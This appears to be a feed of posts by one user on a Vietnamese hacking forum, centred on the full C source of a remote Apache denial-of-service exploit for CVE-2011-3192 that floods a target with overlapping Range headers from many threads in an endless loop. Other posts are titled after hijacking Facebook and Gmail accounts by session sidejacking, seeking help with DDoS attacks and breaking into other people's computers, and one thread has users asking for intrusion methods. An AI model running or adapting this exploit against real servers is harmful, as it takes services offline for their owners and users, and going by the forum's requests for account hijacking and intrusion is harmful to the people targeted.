<![CDATA[Messages posted by "tuyenhva"]]> /hvaonline/posts/listByUser/224188.html JForum - http://www.jforum.net Hack account Facebook, Gmail, Yahoo bằng HTTP Session Sidejacking /hvaonline/posts/preList/40470/261691.html#261691 /hvaonline/posts/preList/40470/261691.html#261691 GMT Apache HTTP DoS Code:
/*
 * This is a reverse engineered version of the exploit for CVE-2011-3192 made
 * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
 * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
 *
 * Compile with the following command:
 * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
 
void ptrace_trap(void) __attribute__ ((constructor));
 
void
ptrace_trap(void) {
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
        write(fileno(stdout), "Segmentation fault\n", 19);
        exit(-1);
    }
}
 
void
w4rn41dun14mu(int attr, int fg, int bg)
{
    char command[13];
 
    sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
    printf("%s", command);
}
 
void
banner()
{
    w4rn41dun14mu(0, 1, 0);
    fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
           stdout);
}
 
void
gime_er_mas()
{
    printf("%c%s", 0x1b, "[2J");
    printf("%c%s", 0x1b, "[1;1H");
    puts("\nsorry dude there's an error...");
}
 
struct thread_info {
    pthread_t thread_id;
    int       thread_num;
    char     *argv_string;
};
 
static void *
thread_start(void *arg)
{
    struct thread_info *tinfo = (struct thread_info *) arg;
    char hostname[64];
    int j;
 
    strcpy(hostname, tinfo->argv_string);
 
    j = 0;
    while (j != 10) {
        struct addrinfo hints;
        struct addrinfo *result, *rp;
        int sfd, s;
        ssize_t nwritten;
 
        memset(&hints, 0, sizeof(struct addrinfo));
        hints.ai_family = AF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_flags = 0;
        hints.ai_protocol = 0;
 
        s = getaddrinfo(hostname, "http", &hints, &result);
        if (s != 0) {
            fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
            exit(EXIT_FAILURE);
        }
 
        for (rp = result; rp != NULL; rp = rp->ai_next) {
            sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
            if (sfd == -1)
                continue;
 
            if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
                close(sfd);
        }
 
        if (result != NULL)
            freeaddrinfo(result);
 
        nwritten = write(sfd, "HEAD / HTTP/1.1\n"
                              "Host:localhost\n"
                              "Range:bytes=0-,0-\n"
                              "Accept-Encoding: gzip", 71);
        if (nwritten == -1)
            close(sfd);
 
        usleep(300000);
 
        j++;
    }
 
    return 0;
}
 
int
main(int argc, char *argv[])
{
    int i;
    struct thread_info tinfo;
 
    banner();
 
    if (argc <= 1) {
        w4rn41dun14mu(0, 2, 0);
        fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
        return 0;
    }
 
    w4rn41dun14mu(0, 3, 0);
    printf("[+] Attacking %s please wait  in minutes ...\n", argv[1]);
 
    while (1) {
        i = 0;
        while (i != 50) {
            tinfo.thread_num = i;
            tinfo.argv_string = argv[1];
 
            pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
 
            usleep(500000);
 
            i++;
        }
    }
}
http://www.exploit-db.com/exploits/18225/]]>
/hvaonline/posts/preList/29851/250961.html#250961 /hvaonline/posts/preList/29851/250961.html#250961 GMT
Giúp e về tấn công ddos với các a ơi. /hvaonline/posts/preList/35245/216652.html#216652 /hvaonline/posts/preList/35245/216652.html#216652 GMT Giúp e về tấn công ddos với các a ơi. /hvaonline/posts/preList/35245/216633.html#216633 /hvaonline/posts/preList/35245/216633.html#216633 GMT Có thể xâm nhập vào máy người khác dc không vói cách đơn giản này /hvaonline/posts/preList/35112/216096.html#216096 /hvaonline/posts/preList/35112/216096.html#216096 GMT Có thể xâm nhập vào máy người khác dc không vói cách đơn giản này

tmd wrote:

tuyenhva wrote:

tuewru wrote:
có IP ở đây là IP gì public hay private ? 
Bác có thể giưới thiệu luôn cả 2 trường hơp luôn cho mọi người học hỏi mà. 
Đọc lùi diễn đàn về vài năm trước, có thể thấy vài cái topic tương tự, cần gì phải giới thiệu lại. 
CNTT thay đổi ngày một liệu vài năm trước giờ có dùng dc nữ ko? nếu biết thì post lên cho mọ người học hỏi đi.]]>
/hvaonline/posts/preList/35112/216074.html#216074 /hvaonline/posts/preList/35112/216074.html#216074 GMT
Có thể xâm nhập vào máy người khác dc không vói cách đơn giản này

tuewru wrote:
có IP ở đây là IP gì public hay private ? 
Bác có thể giưới thiệu luôn cả 2 trường hơp luôn cho mọi người học hỏi mà.]]>
/hvaonline/posts/preList/35112/216067.html#216067 /hvaonline/posts/preList/35112/216067.html#216067 GMT
Có thể xâm nhập vào máy người khác dc không vói cách đơn giản này /hvaonline/posts/preList/35112/216014.html#216014 /hvaonline/posts/preList/35112/216014.html#216014 GMT